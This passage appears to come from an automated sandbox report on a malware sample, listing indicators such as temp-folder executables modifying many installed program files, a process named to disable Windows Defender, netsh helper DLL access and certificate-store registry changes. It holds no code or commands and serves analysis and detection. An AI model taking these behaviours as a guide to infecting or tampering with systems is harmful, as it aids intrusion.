| File opened for modification | C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\protocolhandler.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\uninstall.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jstat.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\msoia.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\NisSrv.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jps.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\nmhproxy.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\pingsender.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javadoc.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javaw.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javaws.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\java.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jjs.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\orbd.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSQRY32.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jdeps.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\tnameserv.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\rmiregistry.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\misc.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\eqnedt32.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\klist.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jdb.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PDFREFLOW.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\disabledupdater.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\ktab.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\133.0.6943.60\os_update_handler.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javah.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSOHTMED.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\wsimport.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\VPREVIEW.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Source Engine\OSE.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseImdsCollector.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Mail\wab.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | C:\Windows\system32\svchost.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\x69install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\x69install.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\TCPView\tcpview64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\Downloads\TCPView\tcpview64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\Colors | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\d99f01ab_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000 | C:\Windows\System32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\d99f01ab_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000 | C:\Windows\System32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\d99f01ab_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\Explorer.EXE | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={63A21001-DC59-4210-ABDB-A980EF09886A}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1747714452" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-c4-75-2d-b8-0a\WpadDecision = "0" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 20 May 2025 04:14:12 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
